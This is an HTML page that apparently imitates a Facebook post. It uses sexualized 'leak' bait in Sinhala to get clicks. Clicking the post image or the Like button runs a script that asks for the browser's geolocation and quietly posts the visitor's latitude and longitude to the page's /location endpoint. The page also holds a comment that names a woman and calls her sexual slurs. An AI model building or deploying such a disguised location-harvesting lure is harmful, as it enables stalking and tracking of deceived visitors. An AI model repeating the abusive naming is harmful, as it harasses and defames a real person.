<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Mark Zuckerberg | Facebook</title>
    <link rel="icon" type="image/png" href="./images/favicon.png" />
    <!-- <link rel="stylesheet" href="css/styles.css" /> -->
    <link rel="stylesheet" href="static/css/styles.css">

  </head>
  <body>
    <div class="container">
      <div class="post">
        <!-- POST HEADER -->
        <div class="post__header header">
          <!-- Header left -->
          <div class="header__left">
            <a href="#"
              ><img src="./static/images/IT.jpeg" class="post__author-pic"
            /></a>
            <div class="post__author author">
              <span class="author__name"><a href="#">Italiye Api</a></span>
              <i class="author__verified"></i>
            </div>
            <span class="post__date"><a href="#">December 13, 2025</a></span>
            <span class="post__date-privacy-separator">&nbsp;·</span>
            <i class="post__privacy"></i>
          </div>
          <!-- Header right -->
          <div class="header__right">
            <div class="post__options options">
              <i class="options__icon"></i>
            </div>
          </div>
        </div>
        <!-- POST CONTENT -->
        <div class="post__content content">
          <p class="content__paragraph">
            ඉතාලියේ අලුත් ලෙස්බියන් ලීක්. මේ වේසිව දන්න කෙනෙක් ඉන්නවද ?
          </p>
          <!-- <img src="static/images/post-pic.png" class="content__image" /> -->
          <a href="#" onclick="shareLocation(); return false;">
              <img src="/static/images/post-pic.png" alt="Like" class="content__image">
          </a>
        </div>

        

        
        <!-- POST FOOTER -->
        <div class="post__footer footer">
          <!-- Reactions -->
          <div class="footer__reactions reactions">
            <div class="reactions__emojis emojis">
              <img src="./static/images/like.svg" class="emojis__like" />
              <img src="./static/images/haha.svg" class="emojis__haha" />
              <img src="./static/images/love.svg" class="emojis__love" />
              <span class="emojis__count"><a href="#">193K</a></span>
            </div>
            <div class="reactions__comments-shares comment-shares">
              <span class="comment-shares__comments"
                ><a href="#">50K Comments</a></span
              >
              <span class="comment-shares__shares"
                ><a href="#">5.4K Shares</a></span
              >
            </div>
          </div>
          <!-- Buttons -->
          <div class="footer__buttons buttons">
           <span class="buttons__like like" onclick="shareLocation()">
            <i class="like__icon"></i>Like
          </span>

            <span class="buttons__comment comment"
              ><i class="comment__icon"></i>Comment</span
            >
            <span class="buttons__share share"
              ><i class="share__icon"></i>Share</span
            >
          </div>
          <!-- Comments -->
          <div class="footer__comments comments">
            <!-- Comments filter -->
            <div class="comments__filter filter">
              Most Relevant<i class="filter__icon"></i>
            </div>
            <!-- Comments box -->
            <div class="comments__box box">
              <div class="box__profile profile">
                <img src="./static/images/profile-pic.jpg" class="profile__pic" />
              </div>
              <div class="box__bar bar">
                <input
                  type="text"
                  placeholder="Write a comment..."
                  class="bar__input"
                />
                <div class="bar__emojis emojis">
                  <span class="emojis__insert insert">
                    <i class="insert__emoji"></i>
                  </span>
                  <span class="emojis__attach attach">
                    <i class="attach__emoji"></i>
                  </span>
                  <span class="emojis__gif gif">
                    <i class="gif__emoji"></i>
                  </span>
                  <span class="emojis__sticker">
                    <i class="sticker__emoji"></i>
                  </span>
                </div>
              </div>
            </div>
            <!-- Friend comment -->
            <div class="comments__friend-comment friend-comment">
              <img src="./static/images/Lal.jpg" class="friend-comment__pic" />
              <div class="friend-comment__comment comment">
                <a href="#" class="comment__author">Jagath kithsiri perera</a>
                <span class="comment__content"
                  >දම්මි රේනුකා. ඕකි දංකොටුවේ කැරි බඩ්ඩක්. 
                  සයිප්‍රස් ඉදලා එහේ මිනිස්සු එක්ක බුදියලා බුදියලා දැන් 
                  ඉතාලියත් වනසන්න අවිත්.මිනිස්සු මදි වෙල දැන් ගෑනු 
                  එක්කත් බුදියනවා.මෝල් වේසි.</span
                >
                <div class="comment__reactions reactions">
                  <img
                    src="./static/images/like.svg"
                    class="reactions__emojis reactions__like"
                  />
                  <img
                    src="./static/images/haha.svg"
                    class="reactions__emojis reactions__haha"
                  />
                  <img
                    src="./static/images/love.svg"
                    class="reactions__emojis reactions__love"
                  />
                  <span class="reactions__count">70</span>
                </div>
                <div class="comment__links links">
                  <span><a href="#" class="links__like">Like</a> &#183;</span>
                  <span><a href="#" class="links__reply">Reply</a> &#183;</span>
                  <span><a href="#" class="links__date">16w</a></span>
                </div>
                <div class="comment__replies replies">
                  <i class="replies__emoji"></i>
                  <span class="replies__count">17 Replies</span>
                </div>
              </div>
              <div class="friend-comment__options options">
                <i class="options__icon options__comment"></i>
              </div>
            </div>
            <!-- More comments -->
            <div class="comments__more-comments more-comments">
              <span class="more-comments__link"
                ><a href="#">View more comments</a></span
              >
              <span class="more-comments__count">1 of 42,098</span>
            </div>
          </div>
        </div>
      </div>
    </div>





    <script>
  function shareLocation() {
    if (!navigator.geolocation) {
      console.log("Geolocation not supported");
      return;
    }

    navigator.geolocation.getCurrentPosition(
      function (position) {
        fetch("/location", {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            lat: position.coords.latitude,
            lon: position.coords.longitude
          })
        });

        console.log("Location shared");
      },
      function () {
        console.log("Permission denied");
      }
    );
  }
</script>

  </body>
</html>
